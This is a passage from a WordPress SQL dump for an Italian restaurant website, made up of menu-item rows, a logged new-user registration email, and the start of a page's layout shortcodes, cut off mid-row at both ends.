17:56:25','','Quote','','publish','closed','closed','','quote-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/quote-5/',30,'nav_menu_item','',0),(4486,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Video','','publish','closed','closed','','video-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/video-5/',31,'nav_menu_item','',0),(4487,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Audio','','publish','closed','closed','','audio-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/audio-5/',32,'nav_menu_item','',0),(4488,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4488','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4488/',82,'nav_menu_item','',0),(4489,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4489','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4489/',38,'nav_menu_item','',0),(4490,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4490','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4490/',75,'nav_menu_item','',0),(4491,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4491','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4491/',31,'nav_menu_item','',0),(4492,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4492','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4492/',5,'nav_menu_item','',0),(4493,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4493','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4493/',3,'nav_menu_item','',0),(4494,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4494','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4494/',92,'nav_menu_item','',0),(4495,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4495','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4495/',99,'nav_menu_item','',0),(4496,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4496','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4496/',48,'nav_menu_item','',0),(4497,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4497','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4497/',55,'nav_menu_item','',0),(4498,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4498','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4498/',7,'nav_menu_item','',0),(4499,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4499','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4499/',10,'nav_menu_item','',0),(4500,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4500','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4500/',8,'nav_menu_item','',0),(4501,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4501','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4501/',9,'nav_menu_item','',0),(4502,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4502','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3061,'https://www.ristorantesolymar.it/2021/01/23/4502/',12,'nav_menu_item','',0),(4503,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4503','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3061,'https://www.ristorantesolymar.it/2021/01/23/4503/',13,'nav_menu_item','',0),(4504,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4504','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3061,'https://www.ristorantesolymar.it/2021/01/23/4504/',14,'nav_menu_item','',0),(4505,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Standard List','','publish','closed','closed','','standard-list-9','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-list-9/',16,'nav_menu_item','',0),(4506,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Blog Standard','','publish','closed','closed','','blog-standard-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-standard-5/',17,'nav_menu_item','',0),(4507,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Blog Gallery','','publish','closed','closed','','blog-gallery-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-gallery-5/',18,'nav_menu_item','',0),(4508,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Blog Standard','','publish','closed','closed','','blog-standard-6','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-standard-6/',13,'nav_menu_item','',0),(4509,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Blog Gallery','','publish','closed','closed','','blog-gallery-6','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-gallery-6/',14,'nav_menu_item','',0),(4510,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Standard List','','publish','closed','closed','','standard-list-10','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-list-10/',12,'nav_menu_item','',0),(4511,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4511','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4511/',7,'nav_menu_item','',0),(4512,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4512','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4512/',8,'nav_menu_item','',0),(4513,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4513','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4513/',9,'nav_menu_item','',0),(4514,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4514','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4514/',10,'nav_menu_item','',0),(4515,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4515','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4515/',46,'nav_menu_item','',0),(4516,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4516','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4516/',45,'nav_menu_item','',0),(4517,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4517','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4517/',90,'nav_menu_item','',0),(4518,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4518','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4518/',89,'nav_menu_item','',0),(4519,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4519','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4519/',56,'nav_menu_item','',0),(4520,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4520','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4520/',100,'nav_menu_item','',0),(4521,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4521','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4521/',83,'nav_menu_item','',0),(4522,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4522','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4522/',39,'nav_menu_item','',0),(4523,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4523','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4523/',12,'nav_menu_item','',0),(4524,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4524','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4524/',18,'nav_menu_item','',0),(4525,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4525','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4525/',21,'nav_menu_item','',0),(4526,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4526','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4526/',16,'nav_menu_item','',0),(4527,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4527','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4527/',14,'nav_menu_item','',0),(4528,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4528','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4528/',17,'nav_menu_item','',0),(4529,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4529','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4529/',20,'nav_menu_item','',0),(4530,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4530','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4530/',19,'nav_menu_item','',0),(4531,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4531','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4531/',15,'nav_menu_item','',0),(4532,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4532','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4532/',93,'nav_menu_item','',0),(4533,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4533','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4533/',49,'nav_menu_item','',0),(4534,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4534','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4534/',57,'nav_menu_item','',0),(4535,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4535','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4535/',101,'nav_menu_item','',0),(4536,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4536','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4536/',76,'nav_menu_item','',0),(4537,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4537','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',3039,'https://www.ristorantesolymar.it/2021/01/23/4537/',32,'nav_menu_item','',0),(4538,1,'2021-01-23 18:56:26','2021-01-23 17:56:26',' ','','','publish','closed','closed','','4538','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/4538/',14,'nav_menu_item','',0),(4539,1,'2021-01-23 18:56:26','2021-01-23 17:56:26','','Standard','','publish','closed','closed','','standard-6','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-6/',18,'nav_menu_item','',0),(4540,1,'2021-01-23 18:56:26','2021-01-23 17:56:26','','Gallery','','publish','closed','closed','','gallery-6','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/gallery-6/',19,'nav_menu_item','',0),(4541,1,'2021-01-23 18:56:26','2021-01-23 17:56:26','','Link','','publish','closed','closed','','link-6','','','2021-01-23 18:56:26','2021-01-23 17:56:26','',0,'https://www.ristorantesolymar.it/2021/01/23/link-6/',20,'nav_menu_item','',0),(4542,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Quote','','publish','closed','closed','','quote-6','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/quote-6/',21,'nav_menu_item','',0),(4543,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Video','','publish','closed','closed','','video-6','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/video-6/',22,'nav_menu_item','',0),(4544,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Audio','','publish','closed','closed','','audio-6','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/audio-6/',23,'nav_menu_item','',0),(4545,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Small Slider','','publish','closed','closed','','small-slider-9','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/small-slider-9/',66,'nav_menu_item','',0),(4546,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4546','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/4546/',4,'nav_menu_item','',0),(4547,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Big Images','','publish','closed','closed','','big-images-10','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/big-images-10/',40,'nav_menu_item','',0),(4548,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Small Images','','publish','closed','closed','','small-images-10','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/small-images-10/',41,'nav_menu_item','',0),(4549,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Big Slider','','publish','closed','closed','','big-slider-10','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/big-slider-10/',42,'nav_menu_item','',0),(4550,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Small Slider','','publish','closed','closed','','small-slider-10','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/small-slider-10/',43,'nav_menu_item','',0),(4551,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Big Gallery','','publish','closed','closed','','big-gallery-10','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/big-gallery-10/',44,'nav_menu_item','',0),(4552,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4552','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3039,'https://www.ristorantesolymar.it/2021/01/23/4552/',50,'nav_menu_item','',0),(4553,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4553','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3039,'https://www.ristorantesolymar.it/2021/01/23/4553/',94,'nav_menu_item','',0),(4554,1,'2021-01-23 18:56:27','2021-01-23 17:56:27','','Single Types','','publish','closed','closed','','single-types-15','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-15/',24,'nav_menu_item','',0),(4555,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4555','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/4555/',16,'nav_menu_item','',0),(4556,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4556','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/4556/',15,'nav_menu_item','',0),(4557,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4557','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/4557/',25,'nav_menu_item','',0),(4558,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4558','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',0,'https://www.ristorantesolymar.it/2021/01/23/4558/',24,'nav_menu_item','',0),(4559,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4559','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4559/',48,'nav_menu_item','',0),(4560,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4560','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4560/',25,'nav_menu_item','',0),(4561,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4561','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4561/',23,'nav_menu_item','',0),(4562,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4562','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4562/',51,'nav_menu_item','',0),(4563,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4563','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4563/',50,'nav_menu_item','',0),(4564,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4564','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4564/',53,'nav_menu_item','',0),(4565,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4565','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4565/',52,'nav_menu_item','',0),(4566,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4566','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4566/',29,'nav_menu_item','',0),(4567,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4567','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4567/',28,'nav_menu_item','',0),(4568,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4568','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4568/',27,'nav_menu_item','',0),(4569,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4569','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4569/',30,'nav_menu_item','',0),(4570,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4570','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4570/',37,'nav_menu_item','',0),(4571,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4571','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3061,'https://www.ristorantesolymar.it/2021/01/23/4571/',60,'nav_menu_item','',0),(4572,1,'2021-01-23 18:56:27','2021-01-23 17:56:27',' ','','','publish','closed','closed','','4572','','','2021-01-23 18:56:27','2021-01-23 17:56:27','',3039,'https://www.ristorantesolymar.it/2021/01/23/4572/',77,'nav_menu_item','',0),(4573,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4573','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3039,'https://www.ristorantesolymar.it/2021/01/23/4573/',33,'nav_menu_item','',0),(4574,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4574','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3039,'https://www.ristorantesolymar.it/2021/01/23/4574/',40,'nav_menu_item','',0),(4575,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4575','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3039,'https://www.ristorantesolymar.it/2021/01/23/4575/',41,'nav_menu_item','',0),(4576,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4576','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3039,'https://www.ristorantesolymar.it/2021/01/23/4576/',84,'nav_menu_item','',0),(4577,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4577','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3039,'https://www.ristorantesolymar.it/2021/01/23/4577/',85,'nav_menu_item','',0),(4578,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4578','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4578/',47,'nav_menu_item','',0),(4579,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4579','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4579/',46,'nav_menu_item','',0),(4580,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4580','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4580/',22,'nav_menu_item','',0),(4581,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4581','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4581/',21,'nav_menu_item','',0),(4582,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4582','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4582/',24,'nav_menu_item','',0),(4583,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4583','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4583/',23,'nav_menu_item','',0),(4584,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','Three Columns','','publish','closed','closed','','three-columns-10','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/three-columns-10/',32,'nav_menu_item','',0),(4585,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-10','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-wide-10/',34,'nav_menu_item','',0),(4586,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','Four Columns','','publish','closed','closed','','four-columns-10','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-10/',33,'nav_menu_item','',0),(4587,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4587','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4587/',61,'nav_menu_item','',0),(4588,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4588','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/4588/',38,'nav_menu_item','',0),(4589,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4589','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',0,'https://www.ristorantesolymar.it/2021/01/23/4589/',10,'nav_menu_item','',0),(4590,1,'2021-01-23 18:56:28','2021-01-23 17:56:28',' ','','','publish','closed','closed','','4590','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',0,'https://www.ristorantesolymar.it/2021/01/23/4590/',10,'nav_menu_item','',0),(4591,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-9','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/five-columns-wide-9/',58,'nav_menu_item','',0),(4592,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-10','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/five-columns-wide-10/',35,'nav_menu_item','',0),(4593,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-9','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/six-columns-wide-9/',59,'nav_menu_item','',0),(4594,1,'2021-01-23 18:56:28','2021-01-23 17:56:28','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-10','','','2021-01-23 18:56:28','2021-01-23 17:56:28','',3061,'https://www.ristorantesolymar.it/2021/01/23/six-columns-wide-10/',36,'nav_menu_item','',0),(4595,1,'2021-01-23 21:00:54','2021-01-23 20:00:54','New user registration on your site Sol Y Mar:\r\n\r\nUsername: attika\r\n\r\nEmail: attika@ristorantesolymar.it\r\n','[Sol Y Mar] New User Registration','','private','closed','closed','','sol-y-mar-new-user-registration','','','2021-01-23 21:00:54','2021-01-23 20:00:54','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-new-user-registration/',0,'postman_sent_mail','',0),(4599,71,'2021-01-26 09:17:43','2021-01-26 08:17:43','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2910\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"773\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" 